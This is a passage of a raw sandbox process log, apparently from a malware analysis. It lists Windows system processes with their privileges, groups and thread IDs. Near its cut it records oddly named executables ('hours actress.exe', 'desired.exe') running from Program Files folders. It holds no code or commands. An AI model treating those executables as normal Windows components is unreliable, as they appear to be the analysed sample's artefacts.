"c:\\windows\\system32\\winlogon.exe" page_root = "0x2beb1000" os_pid = "0x1ac" os_integrity_level = "0x4000" os_privileges = "0x60b16080" monitor_reason = "child_process" parent_id = "31" os_parent_pid = "0xffffffffffffffff" cmd_line = "winlogon.exe" cur_dir = "C:\\Windows\\system32" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 161 os_tid = 0xb28 Thread: id = 162 os_tid = 0xad0 Thread: id = 163 os_tid = 0x3a0 Thread: id = 164 os_tid = 0x334 Thread: id = 165 os_tid = 0x2e0 Thread: id = 166 os_tid = 0x1b0 Process: id = "36" image_name = "services.exe" filename = "c:\\windows\\system32\\services.exe" page_root = "0x1bb25000" os_pid = "0x1d8" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "33" os_parent_pid = "0x178" cmd_line = "C:\\Windows\\system32\\services.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 167 os_tid = 0xafc Thread: id = 168 os_tid = 0xaf8 Thread: id = 169 os_tid = 0xaec Thread: id = 170 os_tid = 0xae8 Thread: id = 171 os_tid = 0x4e8 Thread: id = 172 os_tid = 0x4dc Thread: id = 173 os_tid = 0x4d0 Thread: id = 174 os_tid = 0x378 Thread: id = 175 os_tid = 0x288 Thread: id = 176 os_tid = 0x238 Thread: id = 177 os_tid = 0x234 Thread: id = 178 os_tid = 0x228 Thread: id = 179 os_tid = 0x224 Thread: id = 180 os_tid = 0x220 Thread: id = 181 os_tid = 0x21c Thread: id = 694 os_tid = 0x600 Thread: id = 697 os_tid = 0x410 Thread: id = 812 os_tid = 0x6d8 Process: id = "37" image_name = "lsass.exe" filename = "c:\\windows\\system32\\lsass.exe" page_root = "0xe32b000" os_pid = "0x1e0" os_integrity_level = "0x4000" os_privileges = "0xe60b1e894" monitor_reason = "child_process" parent_id = "33" os_parent_pid = "0x178" cmd_line = "C:\\Windows\\system32\\lsass.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 182 os_tid = 0xb00 Thread: id = 183 os_tid = 0xae4 Thread: id = 184 os_tid = 0xa18 Thread: id = 185 os_tid = 0x230 Thread: id = 186 os_tid = 0x210 Thread: id = 187 os_tid = 0x204 Thread: id = 188 os_tid = 0x200 Thread: id = 189 os_tid = 0x1fc Thread: id = 190 os_tid = 0x1f8 Thread: id = 751 os_tid = 0xb38 Process: id = "38" image_name = "lsm.exe" filename = "c:\\windows\\system32\\lsm.exe" page_root = "0xe234000" os_pid = "0x1e8" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "33" os_parent_pid = "0x178" cmd_line = "C:\\Windows\\system32\\lsm.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 191 os_tid = 0x544 Thread: id = 192 os_tid = 0x30c Thread: id = 193 os_tid = 0x300 Thread: id = 194 os_tid = 0x2f4 Thread: id = 195 os_tid = 0x2f0 Thread: id = 196 os_tid = 0x2ec Thread: id = 197 os_tid = 0x2d8 Thread: id = 198 os_tid = 0x2d0 Thread: id = 199 os_tid = 0x258 Thread: id = 200 os_tid = 0x1ec Thread: id = 648 os_tid = 0x6a4 Process: id = "39" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0xccc3000" os_pid = "0x250" os_integrity_level = "0x4000" os_privileges = "0x60b00080" monitor_reason = "child_process" parent_id = "36" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\system32\\svchost.exe -k DcomLaunch" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\DcomLaunch" [0xa], "NT SERVICE\\PlugPlay" [0xe], "NT SERVICE\\Power" [0xa], "NT AUTHORITY\\Logon Session 00000000:00006e7a" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 201 os_tid = 0xa40 Thread: id = 202 os_tid = 0x708 Thread: id = 203 os_tid = 0x690 Thread: id = 204 os_tid = 0x2a0 Thread: id = 205 os_tid = 0x29c Thread: id = 206 os_tid = 0x284 Thread: id = 207 os_tid = 0x280 Thread: id = 208 os_tid = 0x27c Thread: id = 209 os_tid = 0x278 Thread: id = 210 os_tid = 0x274 Thread: id = 211 os_tid = 0x268 Thread: id = 212 os_tid = 0x260 Thread: id = 213 os_tid = 0x254 Thread: id = 661 os_tid = 0x340 Process: id = "40" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x1a2ff000" os_pid = "0x294" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "36" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\system32\\svchost.exe -k RPCSS" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Network Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\RpcEptMapper" [0xe], "NT SERVICE\\RpcSs" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000b49c" [0xc000000f], "LOCAL" [0x7] Thread: id = 214 os_tid = 0x728 Thread: id = 215 os_tid = 0x3f8 Thread: id = 216 os_tid = 0x2c0 Thread: id = 217 os_tid = 0x2bc Thread: id = 218 os_tid = 0x2b8 Thread: id = 219 os_tid = 0x2b4 Thread: id = 220 os_tid = 0x2ac Thread: id = 221 os_tid = 0x298 Thread: id = 717 os_tid = 0x35c Process: id = "41" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x24f0e000" os_pid = "0x2c8" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "36" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\System32\\svchost.exe -k LocalServiceNetworkRestricted" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\Audiosrv" [0xa], "NT SERVICE\\Dhcp" [0xa], "NT SERVICE\\eventlog" [0xe], "NT SERVICE\\HomeGroupProvider" [0xa], "NT SERVICE\\lmhosts" [0xa], "NT SERVICE\\WPCSvc" [0xa], "NT SERVICE\\wscsvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000b7a5" [0xc000000f], "LOCAL" [0x7] Thread: id = 222 os_tid = 0xaac Thread: id = 223 os_tid = 0x5ac Thread: id = 224 os_tid = 0x6f4 Thread: id = 225 os_tid = 0x488 Thread: id = 226 os_tid = 0x7e8 Thread: id = 227 os_tid = 0x5f8 Thread: id = 228 os_tid = 0x5f0 Thread: id = 229 os_tid = 0x5ec Thread: id = 230 os_tid = 0x5d0 Thread: id = 231 os_tid = 0x12c Thread: id = 232 os_tid = 0x170 Thread: id = 233 os_tid = 0x3c0 Thread: id = 234 os_tid = 0x3b8 Thread: id = 235 os_tid = 0x3a8 Thread: id = 236 os_tid = 0x2fc Thread: id = 237 os_tid = 0x2f8 Thread: id = 238 os_tid = 0x2e4 Thread: id = 239 os_tid = 0x2dc Thread: id = 240 os_tid = 0x2d4 Thread: id = 241 os_tid = 0x2cc Thread: id = 699 os_tid = 0x9e0 Thread: id = 773 os_tid = 0x798 Thread: id = 775 os_tid = 0x78c Thread: id = 797 os_tid = 0x88c Thread: id = 845 os_tid = 0xae0 Process: id = "42" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0xad16000" os_pid = "0x338" os_integrity_level = "0x4000" os_privileges = "0x60b16080" monitor_reason = "child_process" parent_id = "36" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\System32\\svchost.exe -k LocalSystemNetworkRestricted" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\AudioEndpointBuilder" [0xe], "NT SERVICE\\CscService" [0xa], "NT SERVICE\\dot3svc" [0xa], "NT SERVICE\\hidserv" [0xa], "NT SERVICE\\HomeGroupListener" [0xa], "NT SERVICE\\IPBusEnum" [0xa], "NT SERVICE\\Netman" [0xa], "NT SERVICE\\PcaSvc" [0xa], "NT SERVICE\\StorSvc" [0xa], "NT SERVICE\\TabletInputService" [0xa], "NT SERVICE\\TrkWks" [0xa], "NT SERVICE\\UmRdpService" [0xa], "NT SERVICE\\UxSms" [0xa], "NT SERVICE\\WdiSystemHost" [0xa], "NT SERVICE\\Wlansvc" [0xa], "NT SERVICE\\WPDBusEnum" [0xa], "NT SERVICE\\wudfsvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000bc99" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 242 os_tid = 0x638 Thread: id = 243 os_tid = 0x554 Thread: id = 244 os_tid = 0x720 Thread: id = 245 os_tid = 0x668 Thread: id = 246 os_tid = 0x65c Thread: id = 247 os_tid = 0x144 Thread: id = 248 os_tid = 0x110 Thread: id = 249 os_tid = 0x3f0 Thread: id = 250 os_tid = 0x3ec Thread: id = 251 os_tid = 0x3e4 Thread: id = 252 os_tid = 0x3e0 Thread: id = 253 os_tid = 0x3d0 Thread: id = 254 os_tid = 0x3cc Thread: id = 255 os_tid = 0x398 Thread: id = 256 os_tid = 0x394 Thread: id = 257 os_tid = 0x384 Thread: id = 258 os_tid = 0x380 Thread: id = 259 os_tid = 0x368 Thread: id = 260 os_tid = 0x350 Thread: id = 261 os_tid = 0x33c Process: id = "43" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x971d000" os_pid = "0x370" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "36" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\system32\\svchost.exe -k netsvcs" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xa], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xa], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wuauserv" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000d057" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 262 os_tid = 0x674 Thread: id = 263 os_tid = 0x55c Thread: id = 264 os_tid = 0x31c Thread: id = 265 os_tid = 0x500 Thread: id = 266 os_tid = 0x320 Thread: id = 267 os_tid = 0x6cc Thread: id = 268 os_tid = 0x42c Thread: id = 269 os_tid = 0x1e4 Thread: id = 270 os_tid = 0x760 Thread: id = 271 os_tid = 0x75c Thread: id = 272 os_tid = 0x74c Thread: id = 273 os_tid = 0x710 Thread: id = 274 os_tid = 0x6d0 Thread: id = 275 os_tid = 0x6bc Thread: id = 276 os_tid = 0x6b8 Thread: id = 277 os_tid = 0x6b0 Thread: id = 278 os_tid = 0x69c Thread: id = 279 os_tid = 0x698 Thread: id = 280 os_tid = 0x684 Thread: id = 281 os_tid = 0x678 Thread: id = 282 os_tid = 0x4a8 Thread: id = 283 os_tid = 0x46c Thread: id = 284 os_tid = 0x44c Thread: id = 285 os_tid = 0x424 Thread: id = 286 os_tid = 0x41c Thread: id = 287 os_tid = 0x404 Thread: id = 288 os_tid = 0x14c Thread: id = 289 os_tid = 0x158 Thread: id = 290 os_tid = 0x3fc Thread: id = 291 os_tid = 0x3f4 Thread: id = 292 os_tid = 0x3e8 Thread: id = 293 os_tid = 0x39c Thread: id = 294 os_tid = 0x390 Thread: id = 295 os_tid = 0x38c Thread: id = 296 os_tid = 0x388 Thread: id = 297 os_tid = 0x37c Thread: id = 298 os_tid = 0x374 Thread: id = 704 os_tid = 0x5f4 Thread: id = 739 os_tid = 0xa6c Thread: id = 798 os_tid = 0x84c Thread: id = 799 os_tid = 0x91c Thread: id = 800 os_tid = 0x40c Thread: id = 801 os_tid = 0x4e8 Thread: id = 802 os_tid = 0x67c Thread: id = 803 os_tid = 0x8ac Thread: id = 804 os_tid = 0xa90 Thread: id = 805 os_tid = 0xa2c Thread: id = 823 os_tid = 0x81c Thread: id = 901 os_tid = 0x490 Process: id = "44" image_name = "audiodg.exe" filename = "c:\\windows\\system32\\audiodg.exe" page_root = "0x9a6e000" os_pid = "0x3ac" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "41" os_parent_pid = "0x2c8" cmd_line = "C:\\Windows\\system32\\AUDIODG.EXE 0x2c8" cur_dir = "C:\\Windows" os_username = "NT AUTHORITY\\Local Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\Audiosrv" [0xe], "NT SERVICE\\Dhcp" [0xa], "NT SERVICE\\eventlog" [0xe], "NT SERVICE\\HomeGroupProvider" [0xa], "NT SERVICE\\lmhosts" [0xa], "NT SERVICE\\WPCSvc" [0xa], "NT SERVICE\\wscsvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000b7a5" [0xc000000f], "LOCAL" [0x7] Thread: id = 299 os_tid = 0xb5c Thread: id = 300 os_tid = 0xa5c Thread: id = 301 os_tid = 0xa70 Thread: id = 302 os_tid = 0x3c8 Thread: id = 303 os_tid = 0x3c4 Thread: id = 304 os_tid = 0x3bc Thread: id = 305 os_tid = 0x3b0 Process: id = "45" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x972d000" os_pid = "0xc8" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "36" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\system32\\svchost.exe -k LocalService" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\EventSystem" [0xe], "NT SERVICE\\fdPHost" [0xa], "NT SERVICE\\lltdsvc" [0xa], "NT SERVICE\\netprofm" [0xa], "NT SERVICE\\nsi" [0xa], "NT SERVICE\\sppuinotify" [0xa], "NT SERVICE\\SstpSvc" [0xa], "NT SERVICE\\THREADORDER" [0xa], "NT SERVICE\\W32Time" [0xa], "NT SERVICE\\WdiServiceHost" [0xa], "NT SERVICE\\WebClient" [0xa], "NT SERVICE\\WinHttpAutoProxySvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000dde1" [0xc000000f], "LOCAL" [0x7] Thread: id = 306 os_tid = 0x360 Thread: id = 307 os_tid = 0x6a4 Thread: id = 308 os_tid = 0x768 Thread: id = 309 os_tid = 0x764 Thread: id = 310 os_tid = 0x758 Thread: id = 311 os_tid = 0x724 Thread: id = 312 os_tid = 0x718 Thread: id = 313 os_tid = 0x714 Thread: id = 314 os_tid = 0x154 Thread: id = 315 os_tid = 0x150 Thread: id = 316 os_tid = 0x120 Thread: id = 317 os_tid = 0x118 Thread: id = 318 os_tid = 0xf0 Thread: id = 637 os_tid = 0x330 Thread: id = 869 os_tid = 0x548 Thread: id = 878 os_tid = 0x120 Thread: id = 879 os_tid = 0x364 Thread: id = 889 os_tid = 0x7ac Process: id = "46" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x9236000" os_pid = "0x11c" os_integrity_level = "0x4000" os_privileges = "0x60a00000" monitor_reason = "child_process" parent_id = "36" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\system32\\svchost.exe -k NetworkService" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Network Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\CryptSvc" [0xa], "NT SERVICE\\Dnscache" [0xe], "NT SERVICE\\LanmanWorkstation" [0xa], "NT SERVICE\\napagent" [0xa], "NT SERVICE\\NlaSvc" [0xa], "NT SERVICE\\TapiSrv" [0xa], "NT SERVICE\\TermService" [0xa], "NT SERVICE\\Wecsvc" [0xa], "NT SERVICE\\WinRM" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000e33a" [0xc000000f], "LOCAL" [0x7] Thread: id = 319 os_tid = 0xadc Thread: id = 320 os_tid = 0xa78 Thread: id = 321 os_tid = 0x5b8 Thread: id = 322 os_tid = 0x32c Thread: id = 323 os_tid = 0x548 Thread: id = 324 os_tid = 0x750 Thread: id = 325 os_tid = 0x6a0 Thread: id = 326 os_tid = 0x68c Thread: id = 327 os_tid = 0x680 Thread: id = 328 os_tid = 0x66c Thread: id = 329 os_tid = 0x614 Thread: id = 330 os_tid = 0x5fc Thread: id = 331 os_tid = 0x188 Thread: id = 332 os_tid = 0x140 Thread: id = 333 os_tid = 0x128 Thread: id = 334 os_tid = 0x2b0 Thread: id = 335 os_tid = 0x214 Thread: id = 336 os_tid = 0x130 Thread: id = 337 os_tid = 0x218 Thread: id = 338 os_tid = 0x1cc Process: id = "47" image_name = "dwm.exe" filename = "c:\\windows\\system32\\dwm.exe" page_root = "0x6ccf000" os_pid = "0x444" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "42" os_parent_pid = "0x338" cmd_line = "\"C:\\Windows\\system32\\Dwm.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 339 os_tid = 0xab4 Thread: id = 340 os_tid = 0x45c Thread: id = 341 os_tid = 0x450 Thread: id = 342 os_tid = 0x448 Process: id = "48" image_name = "explorer.exe" filename = "c:\\windows\\explorer.exe" page_root = "0x71ab000" os_pid = "0x454" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "35" os_parent_pid = "0xffffffffffffffff" cmd_line = "C:\\Windows\\Explorer.EXE" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 343 os_tid = 0xb88 Thread: id = 344 os_tid = 0xad8 Thread: id = 345 os_tid = 0xac4 Thread: id = 346 os_tid = 0xa98 Thread: id = 347 os_tid = 0x9ec Thread: id = 348 os_tid = 0x408 Thread: id = 349 os_tid = 0x56c Thread: id = 350 os_tid = 0x574 Thread: id = 351 os_tid = 0x550 Thread: id = 352 os_tid = 0x538 Thread: id = 353 os_tid = 0x514 Thread: id = 354 os_tid = 0x50c Thread: id = 355 os_tid = 0x4f0 Thread: id = 356 os_tid = 0x464 Thread: id = 357 os_tid = 0x264 Thread: id = 358 os_tid = 0x658 Thread: id = 359 os_tid = 0x654 Thread: id = 360 os_tid = 0x64c Thread: id = 361 os_tid = 0x5b8 Thread: id = 362 os_tid = 0x578 Thread: id = 363 os_tid = 0x530 Thread: id = 364 os_tid = 0x52c Thread: id = 365 os_tid = 0x528 Thread: id = 366 os_tid = 0x520 Thread: id = 367 os_tid = 0x518 Thread: id = 368 os_tid = 0x510 Thread: id = 369 os_tid = 0x508 Thread: id = 370 os_tid = 0x4f0 Thread: id = 371 os_tid = 0x4b0 Thread: id = 372 os_tid = 0x4ac Thread: id = 373 os_tid = 0x4a4 Thread: id = 374 os_tid = 0x4a0 Thread: id = 375 os_tid = 0x49c Thread: id = 376 os_tid = 0x460 Thread: id = 377 os_tid = 0x458 Thread: id = 764 os_tid = 0xab0 Process: id = "49" image_name = "spoolsv.exe" filename = "c:\\windows\\system32\\spoolsv.exe" page_root = "0x7c150000" os_pid = "0x47c" os_integrity_level = "0x4000" os_privileges = "0x20a00080" monitor_reason = "child_process" parent_id = "36" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\System32\\spoolsv.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\Spooler" [0xe], "NT AUTHORITY\\Logon Session 00000000:00010a1b" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 378 os_tid = 0xabc Thread: id = 379 os_tid = 0x4b8 Thread: id = 380 os_tid = 0x4b4 Thread: id = 381 os_tid = 0x498 Thread: id = 382 os_tid = 0x494 Thread: id = 383 os_tid = 0x480 Process: id = "50" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x35aa000" os_pid = "0x4bc" os_integrity_level = "0x4000" os_privileges = "0x60a00000" monitor_reason = "child_process" parent_id = "36" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\system32\\svchost.exe -k LocalServiceNoNetwork" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BFE" [0xe], "NT SERVICE\\DPS" [0xa], "NT SERVICE\\MpsSvc" [0xa], "NT SERVICE\\pla" [0xa], "NT SERVICE\\WwanSvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0001106d" [0xc000000f], "LOCAL" [0x7], "NT AUTHORITY\\WRITE RESTRICTED" [0x7] Thread: id = 384 os_tid = 0xa58 Thread: id = 385 os_tid = 0x7d8 Thread: id = 386 os_tid = 0x744 Thread: id = 387 os_tid = 0x740 Thread: id = 388 os_tid = 0x73c Thread: id = 389 os_tid = 0x63c Thread: id = 390 os_tid = 0x62c Thread: id = 391 os_tid = 0x628 Thread: id = 392 os_tid = 0x624 Thread: id = 393 os_tid = 0x61c Thread: id = 394 os_tid = 0x610 Thread: id = 395 os_tid = 0x5e8 Thread: id = 396 os_tid = 0x5c8 Thread: id = 397 os_tid = 0x5c0 Thread: id = 398 os_tid = 0x5a0 Thread: id = 399 os_tid = 0x4f8 Thread: id = 400 os_tid = 0x4ec Thread: id = 401 os_tid = 0x4e0 Thread: id = 402 os_tid = 0x4d4 Thread: id = 403 os_tid = 0x4c4 Thread: id = 404 os_tid = 0x4c0 Process: id = "51" image_name = "taskhost.exe" filename = "c:\\windows\\system32\\taskhost.exe" page_root = "0xded000" os_pid = "0x4c8" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "36" os_parent_pid = "0x1d8" cmd_line = "\"taskhost.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 405 os_tid = 0x89c Thread: id = 406 os_tid = 0xa88 Thread: id = 407 os_tid = 0x2a8 Thread: id = 408 os_tid = 0x7f0 Thread: id = 409 os_tid = 0x794 Thread: id = 410 os_tid = 0x784 Thread: id = 411 os_tid = 0x77c Thread: id = 412 os_tid = 0x778 Thread: id = 413 os_tid = 0x770 Thread: id = 414 os_tid = 0x4f4 Thread: id = 415 os_tid = 0x4d8 Thread: id = 416 os_tid = 0x4cc Thread: id = 721 os_tid = 0x224 Process: id = "52" image_name = "taskeng.exe" filename = "c:\\windows\\system32\\taskeng.exe" page_root = "0x76a3f000" os_pid = "0x588" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "43" os_parent_pid = "0x370" cmd_line = "taskeng.exe {4568F795-B030-4E70-B052-419BC1469E0B} S-1-5-21-3388679973-3930757225-3770151564-1000:XDUWTFONO\\5p5NrGJn0jS HALPmcxz:Interactive:Highest[1]" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 417 os_tid = 0xa60 Thread: id = 418 os_tid = 0x5b4 Thread: id = 419 os_tid = 0x5b0 Thread: id = 420 os_tid = 0x59c Thread: id = 421 os_tid = 0x594 Thread: id = 422 os_tid = 0x58c Thread: id = 759 os_tid = 0xa84 Thread: id = 760 os_tid = 0xb20 Thread: id = 832 os_tid = 0xa18 Process: id = "53" image_name = "hours actress.exe" filename = "c:\\program files\\windows nt\\hours actress.exe" page_root = "0x66f35000" os_pid = "0x6fc" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "48" os_parent_pid = "0x454" cmd_line = "\"C:\\Program Files\\Windows NT\\hours actress.exe\" " cur_dir = "C:\\Program Files\\Windows NT\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 423 os_tid = 0x440 Thread: id = 424 os_tid = 0x6f0 Process: id = "54" image_name = "desired.exe" filename = "c:\\program files\\microsoft 